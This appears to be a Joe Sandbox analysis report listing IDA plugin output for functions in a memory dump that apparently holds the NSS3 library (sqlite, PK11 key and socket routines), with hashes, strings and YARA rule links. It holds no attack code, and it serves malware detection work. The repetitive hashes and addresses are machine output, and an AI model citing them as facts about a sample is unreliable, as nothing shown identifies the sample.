Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Monitor$EnterErrorExitfreestrdup
String ID:
API String ID: 1948362043-0
Opcode ID: 1c67f1a8493b0c9d85c05a7bc36a54b9d5b6aad7eddacef8a7394d779f40349b
Instruction ID: 11382b9b91773c5d2d963bedeacf445aa35a26186fbd144f64acb2a6c3140267
Opcode Fuzzy Hash: 1c67f1a8493b0c9d85c05a7bc36a54b9d5b6aad7eddacef8a7394d779f40349b
Instruction Fuzzy Hash: 30F0A4B5F0512567DF60AFA5AD0EF8A7634BB1278DF094130EC0996E00EB72D918C7DA

Function 6C76ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C76A6D8), ref: 6C76AE0D
free.MOZGLUE(?), ref: 6C76AE14
DeleteCriticalSection.KERNEL32(6C76A6D8), ref: 6C76AE36
free.MOZGLUE(?), ref: 6C76AE3D
free.MOZGLUE(00000000,00000000,?,?,6C76A6D8), ref: 6C76AE47

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 243c92dab784e6befa0d547a871002f5b3916953c033f895308ce214ee234fb1
Instruction ID: 983031f6d4509241d45d1f960aa9bd84e9e3b11a0944075347a97426d1cb2ee9
Opcode Fuzzy Hash: 243c92dab784e6befa0d547a871002f5b3916953c033f895308ce214ee234fb1
Instruction Fuzzy Hash: FAF06275201A01A7CB109FE9A909A5BB7BCBE86776B14033DF52A83940D733E115C7D5

Function 6C722B20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 166COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00020C24,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C722B64

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C722B4E
%s at line %d of [%.10s], xrefs: 6C722B5D
misuse, xrefs: 6C722B58

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
API String ID: 632333372-648709467
Opcode ID: 46cab550931517af099f305d39f523a3dbc1e1da4cf8b8db4bd26fe8fb3633ae
Instruction ID: 712b6ad8a1a05ba27914e31589f43b372e84b3fe5cedb37f56f847586506dc15
Opcode Fuzzy Hash: 46cab550931517af099f305d39f523a3dbc1e1da4cf8b8db4bd26fe8fb3633ae
Instruction Fuzzy Hash: 09514671B1420A4BDB04CF68C9897EFB7E2AF49328F184139C819D7B41E739D985C791

Function 6C5E88D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,01DC7D83), ref: 6C5E8990

Strings

@z_l, xrefs: 6C5E8A31

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: memset
String ID: @z_l
API String ID: 2221118986-2584806991
Opcode ID: 39731536da60b45171b90e278a79bfdbc808348dd846d4ab665aa9998f68bf40
Instruction ID: 4e3297c5a95664dec393c6d767396a22e2d3e7e866c1c71a28bda8ef3e41d83b
Opcode Fuzzy Hash: 39731536da60b45171b90e278a79bfdbc808348dd846d4ab665aa9998f68bf40
Instruction Fuzzy Hash: A6510B719057919FC704CF29C9946A6BBF0BF59308B24569DC8884BB03D371F596CBE2

Function 6C5E6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C5E6D36

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C5E6D20
%s at line %d of [%.10s], xrefs: 6C5E6D2F
database corruption, xrefs: 6C5E6D2A

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: c0aa487ee763cd2bd640883830c0855e87095a1cb2144af31a345720d6865043
Instruction ID: 01f5a6f30449fb530ca37fed9af45b4eb1f5c6752c8e452fea636bfcae6c1a73
Opcode Fuzzy Hash: c0aa487ee763cd2bd640883830c0855e87095a1cb2144af31a345720d6865043
Instruction Fuzzy Hash: 392102306003089BC710CE19DE41B5AB7F2AF89358F944928D9499BF51EB70F9448792

Function 6C6C2FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+ll,6C6C32C2,<+ll,00000000,00000000,?), ref: 6C6C2FDA

Part of subcall function 6C6B14C0: TlsGetValue.KERNEL32 ref: 6C6B14E0
Part of subcall function 6C6B14C0: EnterCriticalSection.KERNEL32 ref: 6C6B14F5
Part of subcall function 6C6B14C0: PR_Unlock.NSS3 ref: 6C6B150D

PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C6C300B

Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B10F3
Part of subcall function 6C6B10C0: EnterCriticalSection.KERNEL32(?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B110C
Part of subcall function 6C6B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1141
Part of subcall function 6C6B10C0: PR_Unlock.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1182
Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B119C

SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C6C302A

Part of subcall function 6C6B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6B08B4

Part of subcall function 6C69C3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C69C45D
Part of subcall function 6C69C3D0: TlsGetValue.KERNEL32 ref: 6C69C494
Part of subcall function 6C69C3D0: EnterCriticalSection.KERNEL32(?), ref: 6C69C4A9
Part of subcall function 6C69C3D0: PR_Unlock.NSS3(?), ref: 6C69C4F4

Strings

<+ll, xrefs: 6C6C2FD0

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
String ID: <+ll
API String ID: 2538134263-585971932
Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction ID: 08c3ec7488ff4fcb7fbc5c9e0b2511f31f88e835bcccc32bdd6f841ed9e3f57d
Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction Fuzzy Hash: 341191B7B001087BDB008E65AC01ADB7799AB85668F184134E91CD7781E772E915CBAA

Function 6C71CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C71CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C71CC7B), ref: 6C71CD7A
Part of subcall function 6C71CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C71CD8E
Part of subcall function 6C71CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C71CDA5
Part of subcall function 6C71CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C71CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C71CCB5
memcpy.VCRUNTIME140(6C7B14F4,6C7B02AC,00000090), ref: 6C71CCD3
memcpy.VCRUNTIME140(6C7B1588,6C7B02AC,00000090), ref: 6C71CD2B

Part of subcall function 6C639AC0: socket.WSOCK32(?,00000017,6C6399BE), ref: 6C639AE6
Part of subcall function 6C639AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C6399BE), ref: 6C639AFC

Part of subcall function 6C640590: closesocket.WSOCK32(6C639A8F,?,?,6C639A8F,00000000), ref: 6C640597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C71CCB0

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: a64268c6135f0c131e18d250f6f1086ecceb39cf6f76b21ed6f6a589318c86b1
Instruction ID: 419e6e5ce73e2ad56d374f49fec9405ca730182d024fe314feaa993c9f763504
Opcode Fuzzy Hash: a64268c6135f0c131e18d250f6f1086ecceb39cf6f76b21ed6f6a589318c86b1
Instruction Fuzzy Hash: D01181F2B042405FDB409F6A8F0BF827AA89B46358F145439E91ADBF41E771D4088BED

Function 6C762BE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C762BFA
PR_ExitMonitor.NSS3 ref: 6C762C2B
PR_LogPrint.NSS3(%s incr => %d (for %s),?,?,?), ref: 6C762C5D

Strings

%s incr => %d (for %s), xrefs: 6C762C58

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrint
String ID: %s incr => %d (for %s)
API String ID: 2736670396-2912983388
Opcode ID: 14eedaa49bd4bb494f6eea766ba0ba4ed9dade831d775c115fdd8e784b2eea08
Instruction ID: 0fc8025731e2852521caeee74c9c9134872bddbf70c046eaa9cac7525960610f
Opcode Fuzzy Hash: 14eedaa49bd4bb494f6eea766ba0ba4ed9dade831d775c115fdd8e784b2eea08
Instruction Fuzzy Hash: 1D01B171A052149FDB518E26DA48A4777B9EB8631CB088439EC09C7F00EA31EC09C795

Function 6C5DA8E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6C70A480: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C72C3A2,?,?,00000000,00000000), ref: 6C70A528
Part of subcall function 6C70A480: sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C70A6E0

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014576,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5DA94F

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C5DA939
%s at line %d of [%.10s], xrefs: 6C5DA948
database corruption, xrefs: 6C5DA943

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 7d9a99bc258dc4df181447d1f8340bde2b39566830f63b4b158398ee16e70608
Instruction ID: 131c5bcf76f788564eed204d4fa1d437d9c8d8da21fcffd33712ebf1ce6df509
Opcode Fuzzy Hash: 7d9a99bc258dc4df181447d1f8340bde2b39566830f63b4b158398ee16e70608
Instruction Fuzzy Hash: CC012631B002085BC700CB7EED05B5BB7F5AB49318F864839E94957A40E731B9088795

Function 6C668850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C670715), ref: 6C668859
PR_NewLock.NSS3 ref: 6C668874

Part of subcall function 6C7198D0: calloc.MOZGLUE(00000001,00000084,6C640936,00000001,?,6C64102C), ref: 6C7198E5

PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C66888D

Strings

NSS, xrefs: 6C668887

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPool
String ID: NSS
API String ID: 2230817933-3870390017
Opcode ID: 11ae61fc11875f0d23a237007761a09929445c99d73b24164bf1951d8baf1230
Instruction ID: 96fa8fcd2bc8c91b865f10fa681104922f058432e27e1e63626e358175ef0c5d
Opcode Fuzzy Hash: 11ae61fc11875f0d23a237007761a09929445c99d73b24164bf1951d8baf1230
Instruction Fuzzy Hash: 13F09666E8162033F710227A6D0AB8665985F5775EF044035E90CA7F82EA52D51883FF

Function 6C6FA890 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,00000000,?,6C6E5F25,?,?,?,?,?,?,?,?,?,6C6EAAD4), ref: 6C6FA8A3

Part of subcall function 6C69ADC0: TlsGetValue.KERNEL32(?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE10
Part of subcall function 6C69ADC0: EnterCriticalSection.KERNEL32(?,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE24
Part of subcall function 6C69ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C67D079,00000000,00000001), ref: 6C69AE5A
Part of subcall function 6C69ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE6F
Part of subcall function 6C69ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE7F
Part of subcall function 6C69ADC0: TlsGetValue.KERNEL32(?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AEB1
Part of subcall function 6C69ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AEC9

PK11_FreeSymKey.NSS3(?,00000000,?,6C6E5F25,?,?,?,?,?,?,?,?,?,6C6EAAD4), ref: 6C6FA8BA
SECITEM_ZfreeItem_Util.NSS3(%_nl,00000000,00000000,?,6C6E5F25,?,?,?,?,?,?,?,?,?,6C6EAAD4), ref: 6C6FA8CF

Strings

%_nl, xrefs: 6C6FA894, 6C6FA8CE

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValue$Item_UnlockUtilZfreefreememset
String ID: %_nl
API String ID: 2877228265-1848804039
Opcode ID: d4b7c2764d4df17a3e6cd79f6b089689fe60a70ac4880fdc317b2ce39a19e4e6
Instruction ID: 9bdaea2ef6a738f879fb679ca707f59ae9fb4c04b03452e99a32682cf45bec90
Opcode Fuzzy Hash: d4b7c2764d4df17a3e6cd79f6b089689fe60a70ac4880fdc317b2ce39a19e4e6
Instruction Fuzzy Hash: CBF0E5B2E0171997EB109A55EC00B9773ECAB0175DF048474EC2A97B02E371F80A87E9

Function 6C64C9B0 Relevance: 6.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3 ref: 6C64CB3D
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C64CB4B
sqlite3_free.NSS3 ref: 6C64CB70
sqlite3_result_error_nomem.NSS3 ref: 6C64CB99

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintfsqlite3_result_error_nomemstrlen
String ID:
API String ID: 1052848593-0
Opcode ID: 8fe2bdf87a246a59c8d53feb15c3a6d3e24ce2e409ed2dfa2e5be454ca1ef8a0
Instruction ID: 623fae11090c014cf8593f0f3705fe1d30c7d79889a3de27909eb6f4d1f28a22
Opcode Fuzzy Hash: 8fe2bdf87a246a59c8d53feb15c3a6d3e24ce2e409ed2dfa2e5be454ca1ef8a0
Instruction Fuzzy Hash: 3251D432508B45DAC701EF35C45026BB7F1BF86798F10CA1DE8966AA50EB3194C9C75A

Function 6C714FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C5F85D2,00000000,?,?), ref: 6C714FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C71500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7150C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7150D6

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: 09ce54a638db0e38035536cdf5385927dfb65360eb984d7498b826129ac26af6
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: A5417FB2A402158FCB18CF68DCD179AB7E1BF4431871D466DD84ACBB02E375E891CB91

Function 6C6CCF00 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C6CD01E

Part of subcall function 6C69E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C69E5A0

PK11_FreeSymKey.NSS3(00000000), ref: 6C6CD055

Part of subcall function 6C69ADC0: TlsGetValue.KERNEL32(?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE10
Part of subcall function 6C69ADC0: EnterCriticalSection.KERNEL32(?,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE24
Part of subcall function 6C69ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C67D079,00000000,00000001), ref: 6C69AE5A
Part of subcall function 6C69ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE6F
Part of subcall function 6C69ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AE7F
Part of subcall function 6C69ADC0: TlsGetValue.KERNEL32(?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AEB1
Part of subcall function 6C69ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C67CDBB,?,6C67D079,00000000,00000001), ref: 6C69AEC9

PK11_PubUnwrapSymKey.NSS3(?,00000000,6C6CCC55,00000107,00000000), ref: 6C6CD079
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6CD08C

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
